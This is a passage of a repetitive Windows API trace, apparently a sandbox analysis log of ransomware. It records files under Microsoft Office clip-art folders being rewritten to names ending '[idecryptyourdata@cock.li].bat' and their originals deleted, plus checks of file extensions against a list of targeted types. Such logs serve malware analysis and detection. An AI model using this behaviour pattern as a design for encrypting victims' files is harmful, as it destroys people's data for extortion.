nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.645] SetEndOfFile (hFile=0x3a4) returned 1 [0196.645] CloseHandle (hObject=0x3a4) returned 1 [0196.645] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.645] SetEndOfFile (hFile=0x368) returned 1 [0196.646] CloseHandle (hObject=0x368) returned 1 [0196.646] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0196.646] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152882.wmf")) returned 1 [0196.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF") returned 68 [0196.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF") returned 68 [0196.647] lstrlenW (lpString=".doc") returned 4 [0196.647] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0196.647] lstrlenW (lpString=".docx") returned 5 [0196.647] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0196.647] lstrlenW (lpString=".pdf") returned 4 [0196.647] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0196.647] lstrlenW (lpString=".xls") returned 4 [0196.647] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0196.647] lstrlenW (lpString=".xlsx") returned 5 [0196.647] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0196.647] lstrlenW (lpString=".ppt") returned 4 [0196.647] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0196.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF") returned 68 [0196.647] lstrlenW (lpString=".zip") returned 4 [0196.647] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.647] lstrlenW (lpString=".rar") returned 4 [0196.647] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.647] lstrlenW (lpString=".bz2") returned 4 [0196.647] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0196.647] lstrlenW (lpString=".7z") returned 3 [0196.647] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0196.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF") returned 68 [0196.647] lstrlenW (lpString=".dbf") returned 4 [0196.647] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF") returned 68 [0196.647] lstrlenW (lpString=".1cd") returned 4 [0196.647] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0196.647] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152882.WMF") returned 68 [0196.648] lstrlenW (lpString=".jpg") returned 4 [0196.648] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0196.648] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.648] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152884.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0196.766] GetLastError () returned 0x0 [0196.766] ReadFile (in: hFile=0x368, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1b2c, lpOverlapped=0x0) returned 1 [0196.768] WriteFile (in: hFile=0x330, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1b30, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1b30, lpOverlapped=0x0) returned 1 [0196.769] ReadFile (in: hFile=0x368, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.769] WriteFile (in: hFile=0x330, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.769] SetEndOfFile (hFile=0x330) returned 1 [0196.769] CloseHandle (hObject=0x330) returned 1 [0196.769] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.769] SetEndOfFile (hFile=0x368) returned 1 [0196.770] CloseHandle (hObject=0x368) returned 1 [0196.770] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.032] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0152884.wmf")) returned 1 [0197.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF") returned 68 [0197.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF") returned 68 [0197.040] lstrlenW (lpString=".doc") returned 4 [0197.040] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.040] lstrlenW (lpString=".docx") returned 5 [0197.040] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0197.040] lstrlenW (lpString=".pdf") returned 4 [0197.040] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.040] lstrlenW (lpString=".xls") returned 4 [0197.040] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.040] lstrlenW (lpString=".xlsx") returned 5 [0197.040] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0197.040] lstrlenW (lpString=".ppt") returned 4 [0197.040] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF") returned 68 [0197.040] lstrlenW (lpString=".zip") returned 4 [0197.040] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.040] lstrlenW (lpString=".rar") returned 4 [0197.040] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.040] lstrlenW (lpString=".bz2") returned 4 [0197.040] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.040] lstrlenW (lpString=".7z") returned 3 [0197.040] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF") returned 68 [0197.040] lstrlenW (lpString=".dbf") returned 4 [0197.040] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF") returned 68 [0197.040] lstrlenW (lpString=".1cd") returned 4 [0197.040] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0152884.WMF") returned 68 [0197.040] lstrlenW (lpString=".jpg") returned 4 [0197.040] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.041] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.041] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153302.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0197.042] GetLastError () returned 0x0 [0197.042] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x7850, lpOverlapped=0x0) returned 1 [0197.044] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x7860, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x7860, lpOverlapped=0x0) returned 1 [0197.046] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.046] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.046] SetEndOfFile (hFile=0x338) returned 1 [0197.046] CloseHandle (hObject=0x338) returned 1 [0197.046] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.046] SetEndOfFile (hFile=0x364) returned 1 [0197.047] CloseHandle (hObject=0x364) returned 1 [0197.048] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.048] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153302.wmf")) returned 1 [0197.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF") returned 68 [0197.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF") returned 68 [0197.049] lstrlenW (lpString=".doc") returned 4 [0197.049] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.049] lstrlenW (lpString=".docx") returned 5 [0197.049] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0197.049] lstrlenW (lpString=".pdf") returned 4 [0197.049] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.049] lstrlenW (lpString=".xls") returned 4 [0197.049] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.049] lstrlenW (lpString=".xlsx") returned 5 [0197.049] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0197.049] lstrlenW (lpString=".ppt") returned 4 [0197.049] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF") returned 68 [0197.049] lstrlenW (lpString=".zip") returned 4 [0197.049] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.049] lstrlenW (lpString=".rar") returned 4 [0197.049] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.049] lstrlenW (lpString=".bz2") returned 4 [0197.049] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.049] lstrlenW (lpString=".7z") returned 3 [0197.049] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF") returned 68 [0197.049] lstrlenW (lpString=".dbf") returned 4 [0197.049] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF") returned 68 [0197.049] lstrlenW (lpString=".1cd") returned 4 [0197.049] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.049] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153302.WMF") returned 68 [0197.050] lstrlenW (lpString=".jpg") returned 4 [0197.050] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.050] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.050] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.050] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153305.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0197.051] GetLastError () returned 0x0 [0197.051] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x9658, lpOverlapped=0x0) returned 1 [0197.054] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x9660, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x9660, lpOverlapped=0x0) returned 1 [0197.055] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.056] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.056] SetEndOfFile (hFile=0x338) returned 1 [0197.056] CloseHandle (hObject=0x338) returned 1 [0197.056] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.056] SetEndOfFile (hFile=0x364) returned 1 [0197.057] CloseHandle (hObject=0x364) returned 1 [0197.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.057] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153305.wmf")) returned 1 [0197.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF") returned 68 [0197.058] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF") returned 68 [0197.058] lstrlenW (lpString=".doc") returned 4 [0197.058] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.058] lstrlenW (lpString=".docx") returned 5 [0197.058] lstrcmpiW (lpString1=".docx", lpString2="5.WMF") returned -1 [0197.058] lstrlenW (lpString=".pdf") returned 4 [0197.058] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.058] lstrlenW (lpString=".xls") returned 4 [0197.058] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.059] lstrlenW (lpString=".xlsx") returned 5 [0197.059] lstrcmpiW (lpString1=".xlsx", lpString2="5.WMF") returned -1 [0197.059] lstrlenW (lpString=".ppt") returned 4 [0197.059] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF") returned 68 [0197.059] lstrlenW (lpString=".zip") returned 4 [0197.059] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.059] lstrlenW (lpString=".rar") returned 4 [0197.059] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.059] lstrlenW (lpString=".bz2") returned 4 [0197.059] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.059] lstrlenW (lpString=".7z") returned 3 [0197.059] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF") returned 68 [0197.059] lstrlenW (lpString=".dbf") returned 4 [0197.059] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF") returned 68 [0197.059] lstrlenW (lpString=".1cd") returned 4 [0197.059] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.059] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153305.WMF") returned 68 [0197.059] lstrlenW (lpString=".jpg") returned 4 [0197.059] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.060] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.060] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.060] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153307.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0197.061] GetLastError () returned 0x0 [0197.061] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x3c58, lpOverlapped=0x0) returned 1 [0197.063] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x3c60, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x3c60, lpOverlapped=0x0) returned 1 [0197.066] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.066] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.066] SetEndOfFile (hFile=0x338) returned 1 [0197.066] CloseHandle (hObject=0x338) returned 1 [0197.066] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.066] SetEndOfFile (hFile=0x364) returned 1 [0197.067] CloseHandle (hObject=0x364) returned 1 [0197.067] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.067] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153307.wmf")) returned 1 [0197.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF") returned 68 [0197.068] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF") returned 68 [0197.068] lstrlenW (lpString=".doc") returned 4 [0197.068] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.068] lstrlenW (lpString=".docx") returned 5 [0197.068] lstrcmpiW (lpString1=".docx", lpString2="7.WMF") returned -1 [0197.068] lstrlenW (lpString=".pdf") returned 4 [0197.068] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.068] lstrlenW (lpString=".xls") returned 4 [0197.068] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.068] lstrlenW (lpString=".xlsx") returned 5 [0197.068] lstrcmpiW (lpString1=".xlsx", lpString2="7.WMF") returned -1 [0197.068] lstrlenW (lpString=".ppt") returned 4 [0197.069] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF") returned 68 [0197.069] lstrlenW (lpString=".zip") returned 4 [0197.069] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.069] lstrlenW (lpString=".rar") returned 4 [0197.069] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.069] lstrlenW (lpString=".bz2") returned 4 [0197.069] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.069] lstrlenW (lpString=".7z") returned 3 [0197.069] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF") returned 68 [0197.069] lstrlenW (lpString=".dbf") returned 4 [0197.069] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF") returned 68 [0197.069] lstrlenW (lpString=".1cd") returned 4 [0197.069] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153307.WMF") returned 68 [0197.069] lstrlenW (lpString=".jpg") returned 4 [0197.069] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.070] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.070] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.070] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153313.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0197.070] GetLastError () returned 0x0 [0197.070] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x4238, lpOverlapped=0x0) returned 1 [0197.261] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x4240, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x4240, lpOverlapped=0x0) returned 1 [0197.263] ReadFile (in: hFile=0x364, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.263] WriteFile (in: hFile=0x338, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0197.263] SetEndOfFile (hFile=0x338) returned 1 [0197.263] CloseHandle (hObject=0x338) returned 1 [0197.264] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.264] SetEndOfFile (hFile=0x364) returned 1 [0197.265] CloseHandle (hObject=0x364) returned 1 [0197.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.265] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153313.wmf")) returned 1 [0197.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF") returned 68 [0197.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF") returned 68 [0197.266] lstrlenW (lpString=".doc") returned 4 [0197.266] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.266] lstrlenW (lpString=".docx") returned 5 [0197.266] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0197.266] lstrlenW (lpString=".pdf") returned 4 [0197.266] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.266] lstrlenW (lpString=".xls") returned 4 [0197.266] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.266] lstrlenW (lpString=".xlsx") returned 5 [0197.266] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0197.266] lstrlenW (lpString=".ppt") returned 4 [0197.266] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153313.WMF") returned 68 [0197.266] lstrlenW (lpString=".zip") returned 4 [0197.266] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.266] lstrlenW (lpString=".rar") returned 4 [0197.266] lstrcmpiW (lpString1=".rar", 